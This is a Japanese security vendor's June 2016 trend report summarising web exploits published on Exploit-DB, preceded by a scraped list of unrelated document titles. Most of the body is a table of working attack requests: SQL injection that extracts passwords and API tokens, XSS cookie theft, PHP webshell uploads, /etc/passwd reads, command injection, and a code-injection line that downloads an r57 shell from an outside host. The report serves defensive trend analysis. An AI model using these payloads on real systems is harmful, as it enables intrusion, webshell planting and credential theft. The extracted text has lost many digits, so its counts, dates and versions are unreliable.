最新 Web トレンドレポート (06.06) ~ Exploit-DB(http://exploit-db.com) より公開されている内容に基づいたトレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年

Similar documents
最新 Web トレンドレポート (06.04) ~ Exploit-DB( より公開されている内容に基づいたトレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 4

最新 Web 脆弱性トレンドレポート (06.0) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06

EDB-Report 最新 Web トレンドレポート (05.) 05..0~05.. Exploit-DB( より公開されている内容に基づいたトレンド情報です ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム サマリー 05

最新 Web 脆弱性トレンドレポート (05.09) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム

サマリー EDB-Report 最新 Web 脆弱性トレンドレポート (05.07) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です ペンタセキュリティシステムズ株式会社 R&D センターデー

サマリー EDB-Report ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 8 月に公開された Exploit-DB の分析結果 Cross Site Scripting の攻撃に対する脆弱性報告件数が最も多かったです 発見された Cross Site

最新 Web 脆弱性トレンドレポート (08.0) ~08.0. Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム サマリー 08 年



最新 Web トレンドレポート (06.03) ~ Exploit-DB( より公開されている内容に基づいたトレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 3

サマリー EDB-Report 最新 Web 脆弱性トレンドレポート (207.09) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です ペンタセキュリティシステムズ株式会社 R&D センタ

サマリー EDB-Report 最新 Web 脆弱性トレンドレポート (06.07) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です ペンタセキュリティシステムズ株式会社 R&D センターデー

EDB-Report 最新Web脆弱性トレンドレポート(5.4) 5.4.~5.4.3 Exploit-DB( ペンタセキュリティシステムズ株式会社R&Dセンター データセキュリティチーム サマリー 5

最新 Web トレンドレポート (07.0) ~07.0. Exploit-DB( より公開されている内容に基づいたトレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 07 年 月に公開さ

Copyright 2006 Mitsui Bussan Secure Directions, Inc. All Rights Reserved. 3 Copyright 2006 Mitsui Bussan Secure Directions, Inc. All Rights Reserved.

サマリー EDB-Report 最新 Web トレンドレポート (06.0) ~ Exploit-DB( より公開されている内容に基づいたトレンド情報です ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチー

96 8 PHPlot 1. ( 8.1) 4 1: // 2: // $_SERVER[ HTTP_REFERER ]... 3: // $_SERVER[ HTTP_USER_AGENT ]... 4: // $_SERVER[ REMOTE_ADDR ]... ( ) 5: // $_SERV

ハピタス のコピー.pages

Copyright 2008 All Rights Reserved 2

相続支払い対策ポイント

150423HC相続資産圧縮対策のポイント

実施していただく前に

5-5_arai_JPNICSecSemi_XssCsrf_CM_ PDF

第3回_416.ppt

Cisco® ASA シリーズルーター向けDigiCert® 統合ガイド

SiteLock操作マニュアル

PowerPoint Presentation

FileMaker Server Getting Started Guide

初心者にもできるアメブロカスタマイズ新2016.pages

itechclassifieds Middle School Horizon QCMS myseatxt 0.34 Joomla JV Comment PizzaInn_Project XOS Simple e-document Taboada Macronews godontologico 5 E

- 2 Copyright (C) All Rights Reserved.

SOC Report

% 11.1% +6.% 4, % %+12.2% 54,16 6.6% EV7, ,183 Copyright 216 JAPAN POST GROUP. All Rights Reserved. 1

untitled

shio_ PDF

Copyright All Rights Reserved. -2 -!

Web XXX.XXX.XXX.XXX - - [02/May/2010:12:52: ] "GET /url/url2/page2.htm HTTP/1.1" " "(compatibl

Drive-by-Download攻撃における通信の 定性的特徴とその遷移を捉えた検知方式

Copyright 2006 KDDI Corporation. All Rights Reserved page1

MultiPASS B-20 MultiPASS Suite 3.10使用説明書

IPA:セキュアなインターネットサーバー構築に関する調査

Microsoft PowerPoint - webapp.ppt [互換モード]

Microsoft Word - 最終版 バックせどりismマニュアル .docx

PowerPoint プレゼンテーション

別添 2 SQL インジェクション ぜい弱性診断で最低限行うべき項目 1 ( ' ( 検索キー )''-- ( 検索キー ) and 'a'='a ( 検索キー ) and 1=1 は最低限 行うこと ) OS コマンドインジェクション 2 (../../../../../../../bin/sle

WEBシステムのセキュリティ技術

untitled

EDB-Report 最新Web脆弱性トレンドレポート(07.) 07..0~07.. Exploit-DB( ペンタセキュリティシステムズ株式会社R&Dセンター データセキュリティチーム サマリー 0

内容 エグゼクティブサマリー 攻撃状況の概況 観測手法 収集結果 アカウントに対する攻撃 攻撃概要 攻撃状況 対策 テーマに対する攻撃 攻撃概要...

IM-SecureBlocker

Pro 16 ipad iphone Windows Mac Web App : 12,600 T1 1 1 * Starter Solution Excel PDF Web Web CSV, Excel, XML, ODBC ODBC / JDBC ** SQL REST API (JSON, c

Trend Micro Safe Lock 2.0 Patch1 管理コンソールのシステム要件 OS Windows XP (SP2/SP3) [Professional] Windows 7 (SP なし /SP1) [Professional / Enterprise / Ultimate] W

KDDI

Copyright 2009, SofTek Systems, Inc. All rights reserved.

untitled

Copyright Qetic Inc. All Rights Reserved. 2

Releases080909

Insert VERITAS™ White Paper Title Here

untitled

いま本文ー校了データ0822.indd

タイトルを1~2行で入力 (長文の場合はフォントサイズを縮小)

PHP4徹底攻略 改訂版

untitled

Windows Oracle -Web - Copyright Oracle Corporation Japan, All rights reserved.

Si-R180 ご利用にあたって

FileMaker Server 9 Getting Started Guide

WIDE 1

VMware View Persona Management

- 2 Copyright (C) All Rights Reserved.


wide94.dvi

P2P? ( )? ( SOX ) ( ) COPYRIGHT 2005 SSH COMMUNICATIONS SECURITY CORP. ALL RIGHTS RESERVED. 2

健康保険組合のあゆみ_top

リバースマップ原稿2

システム要件 Trend Micro Safe Lock 2.0 SP1 Trend Micro Safe Lock 2.0 SP1 エージェントのシステム要件 OS Client OS Server OS Windows 2000 (SP4) [Professional] (32bit) Wind

how-to-decide-a-title

契約№2020-XXXX


LAPLINK ヘルプデスク 導入ガイド

URL AdobeReader Copyright (C) All Rights Reserved.

アップデートマニュアル

Copyright 2017 JAPAN POST BANK CO., LTD. All Rights Reserved. 1

_‚Ofl¼

rzat10pdf.ps

脆弱性対策情報データベース JVN ipedia に関する活動報告レポート [2019 年第 3 四半期 (7 月 ~9 月 )] 脆弱性対策情報データベース JVN ipedia に関する活動報告レポートについて 本レポートでは 2019 年 7 月 1 日から 2019 年 9 月 30 日まで

スライド 1

MultiPASS Suite 3.20 使用説明書

FileMaker Pro 15 および FileMaker Pro 15 Advanced インストールおよび新機能ガイド

P. 2 P. 4 P. 5 P. 6 P. 7 P. 9 P P.11 P.14 P.15 P.16 P.16 P.17 P.19 P.20 P.22 P P P P P P P P P

P. 2 P. 4 P. 5 P. 6 P. 7 P. 9 P.10 P.12 P.13 P.14 P.14 P.15 P.17 P.18 P.20 P P P P P.25 P.27 P.28 Copyright 2016 JAPAN POST BA

XMLアクセス機能説明書

Configuring_01

別紙 年第 3 四半期脆弱性対策情報データベース JVN ipedia の登録状況 ( 詳細 ) 1. 脆弱性対策情報の登録状況 年第 3 四半期に登録した脆弱性の種類別件数図 8 のグラフは JVN ipedia へ 2012 年第 3 四半期に登録した脆弱性対策情

untitled

WordPress Web

チェックしておきたいぜい弱性情報2009< >

2

Oracle Change Management Pack, Oracle Diagnostics Pack, Oracle Tuning Packインストレーション・ガイド リリース2.2

FileMaker WebDirect Guide

システム要件 Trend Micro Safe Lock Trend Micro Safe Lock 2.0 エージェントのシステム要件 OS Client OS Server OS Windows 2000 (SP4) [Professional] (32bit) Windows XP (SP1/

Transcription:

06.06

最新 Web トレンドレポート (06.06) 06.06.0~06.06.30 Exploit-DB(http://exploit-db.com) より公開されている内容に基づいたトレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 6 月は 上半期 Exploit-DB のの中で最も多くのが報告されました それによって 攻撃の種類も多様に報告されました SQL Injection XSS などの攻撃報告数が最も多かったですが 新しい攻撃方法や攻撃パターンでの特異点は発見されませんでした SQL Injection のほとんどは 攻撃の難易度や危険度が低いが多数であり 単にがあるかないかを確認する攻撃パターンでした しかし 該当の攻撃パターンが成功し が発見されたプログラムは追加的な攻撃が入ってくる恐れがあるので 発見されたページやパラメーターを確認し セキュアコーディングやソフトウェアのアップデートが必須的に求められます SQL Injection のほか PHP Code Injection が発見された数が 3 位と報告されました PHP Code Injection は SQL Injection に比べて 相対的に危険度が低いと分類されますが 多くの Web サイトが PHP で構成されているので 攻撃頻度が高いです PHP Code Injection にさらされないように fputs と fwrite など PHP で実際的に使われる関数と命令語はあらかじめ定義して使うことが求められます. 別件数カテゴリ リモートファイル挿入 (Remote File Inclusion:RFI) コマンドインジェクション (Command Injection) ファイルアップロード (File Upload) ローカルファイル挿入 (Local File Inclusion:LFI) ディレクトリトラバーサル (Directory Traversal) コード インジェクション (Code Injection) クロスサイトスクリプティング (Cross Site Scripting : XSS) 件数 3 3 4 4 4 3 SQL インジェクション 7 (SQL Injection) 合計 49 別件数 3 3 4 4 4 3 7 49 60 50 40 30 0 0 0. 危険度別件数 危険度 件数 割合 早急対応要 5 0% 高 44 90% 合計 49 00% 危険度別分類 5 早急対応要 高 44 3. 攻撃実行の難易度別件数 難易度 件数 割合 難 4% 中 5 3% 易 3 65% 合計 49 00% 攻撃実行の難易度別件数 5 3 難 中 易 4. 主なソフトウェア別発生件数ソフトウェア名 Wordpress Nagios snews CMS XuezhuLi FileSharing Kagao Cisco EPC 398 BigTree CMS Notilus Travel Solution Software SugarCRM Drale DBTableViewer Electroweb Viart MyLittleForum jbfilemanager Airia OPAC KpwinSQL Relay Ajax Directory Manager Concrete5 Alibaba Clone BB Script rconfig ibilling Ultrabenosaurus ChatBoard Apache Tiki-Wiki CMS Liferay CE Vicidial Ktools Dokeos wwiki 合計 件数 5 4 3 49 主なソフトウェア別発生件数 5 4 3 Wordpress Nagios snews CMS XuezhuLi FileSharing Kagao Cisco EPC 398 BigTree CMS Notilus Travel Solution Software SugarCRM Drale DBTableViewer Electroweb Viart MyLittleForum jbfilemanager Airia OPAC KpwinSQL Relay Ajax Directory Manager Concrete5 Alibaba Clone BB Script rconfig ibilling Ultrabenosaurus ChatBoard Apache Copyright 06 Penta Security Systems Inc. All rights reserved

最新 Web トレンドレポート (06.06) 06.06.0~06.06.30 Exploit-DB(http://exploit-db.com) より公開されている内容に基づいたトレンド情報です 危険度分類基準早急対応要 : 攻撃が成功した場合システムへ侵入可高 : システム情報を取得するか あるいはクライアントに 次被害を及ぼす中 : 情報漏洩攻撃実行難易度分類基準難 : 複数のを突いた攻撃パターン 対象のシステムの重要な情報を取得するため 高度な攻撃コードを採用したパターン 知らされていない攻撃コードを採用したパターンのいずれかに該当する中 : 攻撃手法自体は難しくないが 迂回コードを採用したパターン易 : 回のリクエストで攻撃が成立するパターン 複数回トライするも 既知の攻撃コードを採用したパターンのいずれかに該当する Copyright 06 Penta Security Systems Inc. All rights reserved

最新 Web トレンドレポート (06.06) 06.06.0~06.06.30 Exploit-DB(http://exploit-db.com) より公開されている内容に基づいたトレンド情報です 06-06-0 39876 Code Injection 易高.0.3. - index.php Remote Command Execution POST /%0.0.3./ajaxexplorer/index.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/535.7.0.3. strpage=control/file/editor&strpath=p:/&strfile=terminal. php&strtext=<?php exec($_get["cmd"]);?> 06-06-0 39876 XSS 易高.0.3. - index.php XSS POST /%0.0.3./ajaxexplorer/index.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/535.7.0.3. strpage=control/file/editor&strpath=p:/&strfile=terminal. php&strtext=<script>alert(666)</script> 06-06-0 3988 File Upload 易高 POST / HTTP/. Connection: CloseAccept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0) Relay Ajax Directory Manager Content-Type: multipart/form-data; boundary=------------- relayb0-07706,.5.,.5.3 - --------------7dd009908f / File Upload -----------------------------7dd009908f Content-Disposition: form-data; name="file"; filename="info.php" Content-Type: application/octet-stream Relay Ajax Directory Manager Relay Ajax Directory Manager relayb0-07706,.5.,.5.3 <? phpinfo();?> -----------------------------7dd009908f-- 06-06-0 39880 XSS 易高 Liferay CE < 6. CE GA6 - /liferay/web/guest/ XSS POST /liferay/web/guest/home?p_p_id=58&p_p_lifecycle=&p_ p_state= maximized&p_p_mode=view&_58_struts_action=%flog in%fcreate_account HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/535.7 Liferay CE Liferay CE < 6. CE GA6 _58_firstName=%%3E%3Cscript%3Ealert%8%7xs s%7%9%3c% 06-06-0 39879 SQL Injection 中早急対応要 SecurityCheck Extension.8.9 - index.php SQL Injection /index.php?option='or(extractvalue(,concat(0x3a,(selec t(database())))))=' SecurityCheck Extension.8.9 06-06-06 39899 SQL Injection 中早急対応要 Nagios XI 5..7 - nagiosim.php SQL Injction /nagiosxi/includes/components/nagiosim/nagiosim.php? mode=resolve&host=a&service='+and+(select++fro M(SELECT+COUNT(*),CONCAT(' APIKEY ',(SELECT+MID( (IFNULL(CAST(backend_ticket+AS+CHAR),0x0)),,54)+F ROM+xi_users+WHERE+user_id%3d+LIMIT+0,),' APIK EY ',FLOOR(RAND(0)*))x+FROM+INFORMATION_SCHE MA.CHARACTER_SETS+GROUP+BY+x)a)+OR+' Nagios Nagios XI 5..7 Copyright 06 Penta Security Systems Inc. All rights reserved

最新 Web トレンドレポート (06.06) 06.06.0~06.06.30 Exploit-DB(http://exploit-db.com) より公開されている内容に基づいたトレンド情報です 06-06-06 39898 LFI 易高 rconfig 3.. - downloadfile.php LFI /lib/crud/downloadfile.php?download_file=/etc/passwd rconfig rconfig 3.. 06-06-06 39897 SQL Injection 難早急対応要 Notilus Travel Solution Software 0 R3 - Password.aspx SQL Injection POST /company/profilv4/password.aspx HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/535.7 ACTION=&H_OLD=mypass'%3bdeclare%0@q%0varc har(99)%3bset%0@q%3d'\\\\testdomain.mydo'% b'main.com\\vps'%3b%0exec%0master.dbo.xp_d irtree%0@q%3b-- %0&H_NEW=%7+or+%7%7%3D%7&H_NEW =%7+or+%7%7%3D%7 Notilus Travel s Travel Solution So Solution Software 0 R 06-06-06 39896 SQL Injection 中早急対応要 POST /wp-admin/adminajax.php?action=populate_download_edit_form HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 WordPress Double Opt-In for Download Plugin.0.9 - adminajax.php SQL Injection Chrome/6.0.9.75 Safari/535.7 Wordpress WordPress Double Opt-In for Download Plugin.0. id=0 UNION SELECT,, 4, 5, 6, 7, user_pass FROM wp_users WHERE ID= 06-06-06 3989 RFI 易高 WordPress WP Mobile Detector Plugin 3.5 - resize.php RFI 脆弱 性 /wp-content/plugins/wp-mobiledetector/resize.php?src=http://www.test.com/index.php Wordpress WordPress WP Mobile Detector Plugin 3.5 06-06-06 39890 SQL Injection 易高 Electroweb Online Examination System.0 - showtest.php SQL Injection /showtest.php?subid=%0and%0=-- Electroweb Electroweb Online Examination System.0 06-06-06 39899 Command Injection 中高 Nagios XI 5..7 - nagiosim.php Command Injection /nagiosxi/includes/components/nagiosim/nagiosim.php?m ode=update&token=<apitoken>&incident_id=<valid incident id>&title=title'; touch /tmp/file; echo&status= Nagios Nagios XI 5..7 06-06-06 39899 Command Injection 中高 Nagios XI 5..7 - graphapi.php Command Injection /nagiosxi/includes/components/perfdata/graphapi.php?ho st=<any monitoredhost IP>&start=&end=; touch /tmp/file; Nagios Nagios XI 5..7 Copyright 06 Penta Security Systems Inc. All rights reserved

最新 Web トレンドレポート (06.06) 06.06.0~06.06.30 Exploit-DB(http://exploit-db.com) より公開されている内容に基づいたトレンド情報です 06-06-06 39886 XSS 易高 /continuum/security/useredit_confirmadminpassword.act ion?useradminpassword=&username=guest&user.userna me=guest<script>alert(document.cookie)</script>&user.f ullname=guest&user.email=blah@procheckup.com&user.password=password&user.confirmpassword=password& user.timestampaccountcreation=&user.timestamplastlo gin=&user.timestamplastpasswordchange=&user.locked =false&user.passwordchangerequired=false&method:co Apache Continuum.4. - nfirmadminpassword=submit&cancel=cancel<http://7 useredit_confirmadminpasswor.0.0.:8080/continuum/security/useredit_confirmadminp d.action XSS assword.action?useradminpassword=&username=guest &user.username=guest%3cscript%3ealert(document.coo kie)%3c/script%3e&user.fullname=guest&user.email=bl ah@procheckup.com&user.password=password&user.co nfirmpassword=password&user.timestampaccountcreati on=&user.timestamplastlogin=&user.timestamplastpass wordchange=&user.locked=false&user.passwordchange Required=false&method:confirmAdminPassword=Submit &cancel=cancel> Apache Apache Continuum.4. 06-06-06 39883 LFI 易高 WordPress Simple Backup /wpadmin/tools.php?page=backup_manager&download_bac Plugin.7. - tools.php LFI 脆 弱性 kup_file=oldbackups/../../../../../../etc/passwd WordPress WordPress Simple Backup Plugin.7. 06-06-07 39904 XSS 易高 Cisco EPC 398 - /goform/administration XSS POST /goform/administration HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/535.7 working_mode=0&sysname=<script>alert('xss')</script> &syspasswd=home&sysconfirmpasswd=home&save=sav e+settings&preworkingmode=&h_wlan_enable=enable &h_user_type=common Cisco EPC 398 Cisco EPC 398 06-06-07 39904 XSS 易高 Cisco EPC 398 - /goform/wclientmaclist POST /goform/wclientmaclist HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/535.7 sortwireless=mac&h_sortwireless=mac" onmouseover=alert() x="y Cisco EPC 398 Cisco EPC 398 06-06-08 39905 SQL Injection 中高 Drale DBTableViewer 003 - /vul_test/dbtableviewer/ SQL Injection /vul_test/dbtableviewer/?orderby=nice_name%0rlike %0(SELECT%0(CASE%0WHEN%0(697=697)% 0THEN%00x6e6963655f6e66d65%0ELSE%00x 8%0END))&sort=DESC&sort=DESC Drale DBTableViewer Drale DBTableViewer 00 06-06-3 39936 SQL Injection 易高 PayPlans index.php?option=com_payplans&group_id=%0and% (com_payplans) Extension 3.3.6 0=-- - index.php SQL Injection PayPlans (com_payplans) Extension 3.3.6 Copyright 06 Penta Security Systems Inc. All rights reserved

最新 Web トレンドレポート (06.06) 06.06.0~06.06.30 Exploit-DB(http://exploit-db.com) より公開されている内容に基づいたトレンド情報です 06-06-3 3993 File Upload 易高 POST /admin/admin_fm_upload_files.php HTTP/. Connection: CloseAccept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0) Viart Shopping Cart 5.0 - Content-Type: multipart/form-data; boundary=------------- admin_fm_upload_files.php File --------------7dd009908f Upload -----------------------------7dd009908f Content-Disposition: form-data; name="newfile_0"; filename="shell.php" Content-Type: application/octet-stream Viart Viart Shopping Cart 5.0 <? phpinfo();?> -----------------------------7dd009908f-- 06-06-5 39956 Directory Traversal 易高 jbfilemanager - jbfm.php Directory Traversal /vul_test/jbfilemanager/jbfm/jbfm.php?act=open&path= /../../../../../../../../../etc/ jbfilemanager jbfilemanager 06-06-5 39955 XSS 易高 Booking System < 5.5 - eventlist.php XSS /scripts/booking/eventlist.php?serviceid=337%%0 onmouseover=%alert() Booking System < 5.5 06-06-5 39953 SQL Injection 易高 En Masse (com_enmasse) Component 5. /component/enmasse/term?tmpl=component&id=%0-6.4 - /component/enmasse/ and%0=-- SQL Injection En Masse (com_enmasse) Component 5. 06-06-5 3995 SQL Injection 中高 Dokeos.. - slideshow.php SQL Injection /dokeos-../main/document/slideshow.php?cidreq=3&curdir path=%7%0and%0(select%0*%0from%0( SELECT(SLEEP(5)))Pfag)%0AND%0%7NFwV%7= %7NFwV&slide_id=all Dokeos Dokeos.. 06-06-5 39955 SQL Injection 易高 POST /ajax/checkchangeavailability.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Booking System < Chrome/6.0.9.75 Safari/535.7 5.5 - eventlist.php SQL Injection Booking System < 5.5 id=' AND SLEEP(5) AND 'WAlE'='WAlE Copyright 06 Penta Security Systems Inc. All rights reserved

最新 Web トレンドレポート (06.06) 06.06.0~06.06.30 Exploit-DB(http://exploit-db.com) より公開されている内容に基づいたトレンド情報です 06-06-5 39950 XSS 易高 wwiki - index.php XSS POST /vul_test/wwiki/index.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/535.7 wwiki wwiki page=xss&newtext=afsd%3cimg+src%3d%h%+o nerror%3dalert%845%9%3eaa&action=save 06-06-5 39948 XSS 易高 Ultrabenosaurus ChatBoard - chat.php XSS POST /vul_test/chatboard/ original/chat.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/535.7 Ultrabenosaurus ChatBoard Ultrabenosaurus ChatBoard msg=654<img src="z" onerror=zz>asd 06-06-6 39965 Code Injection 中高 /tikicalendar.php?viewmode=%7;%0$z=fopen%8%shell.p Tiki-Wiki CMS Calendar 4.,.5 LTS, 9. LTS, and 6.5 - hp%,%7w%7%9;fwrite%8$z,file_get_contents%8% tiki-calendar.php Code Injection http://hackersite.com/r57.txt%%9%9;fclose%8$z%9 ;%7 Tiki-Wiki CMS Tiki-Wiki CMS Calendar 4.,.5 LTS, 9. LTS, and 6.5 06-06-7 39970 XSS 中高 Vicidial. - admin.php XSS POST / HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/535.7 ADD=&DB=&script_id=tests&script_name=<scrip t>alert('xss!'</script>&script_comments=test& active=y&user_group=---all--- &selectedfield=fullname&script_text=<script>alert('xss!'</script>&submit=submit Vicidial Vicidial. 06-06-0 3998 File Upload 易高 Airia - editor.php File Upload POST /editor.php HTTP/. Connection: CloseAccept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0) Content-Type: multipart/form-data; boundary=------------- --------------7dd009908f Airia Airia -----------------------------7dd009908f Content-Disposition: form-data; name="file"; filename="shell.php" Content-Type: application/octet-stream <?php echo 'Airia Webshell Exploit';#{shell};?> -----------------------------7dd009908f-- 06-06-0 39977 SQL Injection 易高 BT Media (com_bt_media) Component - index.php SQL Injection /index.php?option=com_bt_media&view=list&categories[ 0]=%0and%0=--&Itemid=34 BT Media (com_bt_media) Component Copyright 06 Penta Security Systems Inc. All rights reserved

最新 Web トレンドレポート (06.06) 06.06.0~06.06.30 Exploit-DB(http://exploit-db.com) より公開されている内容に基づいたトレンド情報です 06-06-0 39976 Command Injection 易 高 POST /snews.7./?action=process&task=admin_article&id= HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64.7. - /snews.7./ Command Inje Chrome/6.0.9.75 Safari/535.7 snews CMS snews CMS.7. text=[func]system: :"calc.exe"[/func] 06-06-0 39976 XSS 易高 snews CMS.7. - /snews.7./ XSS POST /snews.7./?action=process&task=admin_article&id= HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/535.7 snews CMS snews CMS.7. text=[include]<script>alert(document.cookie)</script>[/in clude] 06-06- 39989 SQL Injection 易高 Publisher Pro (com_publisher) Component - index.php SQL Injection /index.php?option=com_publisher&view=issues&itemid= %0and%0=--&lang=en Publisher Pro (com_publisher) Component 06-06-3 400 Directory Traversal 中高 - api.php Directory Traversal /vul_test//api.php?callback=jquery076857 43998649676_46666565&type=get&mode=0&fol der=li4vli4vli4vli4vli4vli4vzxrjlw==&_=4666656 7 06-06-3 40009 Directory Traversal 易高 XuezhuLi FileSharing - download.php Directory Traversal /vul_test/filesharing/download.php?file_name=../../../../.. /../../../../../../../../etc/passwd XuezhuLi FileSharing XuezhuLi FileSharing 06-06-3 40006 LFI 易高 Alibaba Clone BB Script - show_page.php LFI /show_page.php?page=../configure.php%00 Alibaba Clone BB Script Alibaba Clone BB Script 06-06-3 400 XSS 易高 - api.php XSS /vul_test//api.php?callback=jquery078 746545656_466665079}}c07%3Cscript%3E alert%8%9%3c%fscript%3ecfea&type=get&mod e=0&_=466665080 Copyright 06 Penta Security Systems Inc. All rights reserved

最新 Web トレンドレポート (06.06) 06.06.0~06.06.30 Exploit-DB(http://exploit-db.com) より公開されている内容に基づいたトレンド情報です 06-06-3 40009 Directory Traversal 易高 XuezhuLi FileSharing - /vul_test/filesharing/viewing.php?file_name=../../../../../.. viewing.php Directory Traversal /../../../../../../../etc/passwd XuezhuLi FileSharing XuezhuLi FileSharing 06-06-7 4004 SQL Injection 難早急対応要 BigTree CMS 4.. - /site/index.php/admin/pages/up date/ SQL Injection POST /site/index.php/admin/pages/update/ HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/535.7 page=' and 6=3 or =+(SELECT and ROW(,)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHA R(5),CHAR(00),CHAR(05),CHAR(08),CHAR(0),CH AR(09),CHAR(09),CHAR(97),0x3a,FLOOR(RAND(0)*) )x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+' BigTree CMS BigTree CMS 4.. 06-06-7 400 XSS 中高 ibilling 3.7.0 - index.php XSS POST /ibilling/index.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/535.7 account=%%3e%3cscript%3ealert()%3c%fscript %3E&company=%%3E%3Cscript%3Ealert()%3C% Fscript%3E&email=test%40yahoo.com&phone=%% 3E%3Cscript%3Ealert(4)%3C%Fscript%3E&address= %%3E%3Cscript%3Ealert(5)%3C%Fscript%3E&city =%%3E%3Cscript%3Ealert(6)%3C%Fscript%3E&st ate=%%3e%3cscript%3ealert(7)%3c%fscript%3e &zip=%%3e%3cscript%3ealert(8)%3c%fscript%3 E&country=TR&tags%5B%5D=web_development%% 3E%3Cscript%3Ealert(9)%3C%Fscript%3E ibilling ibilling 3.7.0 06-06-7 400 Code Injection 中高 POST /install/index.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 MyLittleForum.3.5 - Chrome/6.0.9.75 Safari/535.7 /install/index.php Code Injection MyLittleForum MyLittleForum.3.5 database=';?><?php echo passthru('/bin/cat /etc/passwd');' 06-06-7 4009 SQL Injection 中高 Kagao 3.0 - cat.php SQL Injection /cat.php?id=999999.9%%0union%0all%0selec t%0concat%80x7e%c0x7%cunhex%8hex%8 cast%8database%8%9%0as%0char%9%9% 9%C0x7%C0x7e%9--%0a Kagao Kagao 3.0 06-06-7 4007 Code Injection 易高 SugarCRM 6.5.8 - index.php Code Injection /index.php?module=connectors&action=runtest&source_ id=ext_rest_insideview&ext_rest_insideview_[%7.phpinfo(). %7]= SugarCRM SugarCRM 6.5.8 Copyright 06 Penta Security Systems Inc. All rights reserved

最新 Web トレンドレポート (06.06) 06.06.0~06.06.30 Exploit-DB(http://exploit-db.com) より公開されている内容に基づいたトレンド情報です 06-06-7 4009 XSS 中 高 /cat.php?id=0&pricestart=0&room=&flache=&price=&z ulassung=&kilometer=&kraftstoff=&id3=0&suche=%% Kagao 3.0 - cat.php XSS 3E%3Cscript%3Ealert%8%7n4tural%7%9%3B%3C%Fs cript%3e&id=0&suchewo=&umkreis=0 Kagao Kagao 3.0 06-06-7 4003 SQL Injection 易高 OPAC KpwinSQL - zaznam.php SQL Injection /zaznam.php?detail_num=%0and%0=-- OPAC KpwinSQL OPAC KpwinSQL 06-06-9 40045 LFI 易高 GET /concrete5/index.php HTTP/. Concrete5 5.7.3. - index.php LFI X-Original-Url: /tools/../../index Connection: keep-alive Concrete5 Concrete5 5.7.3. 06-06-9 4004 SQL Injection 中高 WordPress Ultimate Membership Pro Plugin 3.3 - admin-ajax.php SQL Injection POST / HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/535.7 action=ihc_preview_user_listing&shortcode=[ihc-listusers filter_by_level="" levels_in="[ihc-list-users filter_by_level="" levels_in="') union all select (SELECT CASE WHEN ($sql) then else *(select table_name from information_schema.tables) end)#" theme="ihctheme_" theme="ihc-theme_ Wordpress WordPress Ultimate Membership Pro Plugin 3.3 06-06-30 40046 SQL Injection 易高 Ktools Photostore 4.7.5 - mgr.login.php SQL Injection POST / HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/535.7 Ktools Ktools Photostore 4.7.5 email=%7%0and%0=--;# Copyright 06 Penta Security Systems Inc. All rights reserved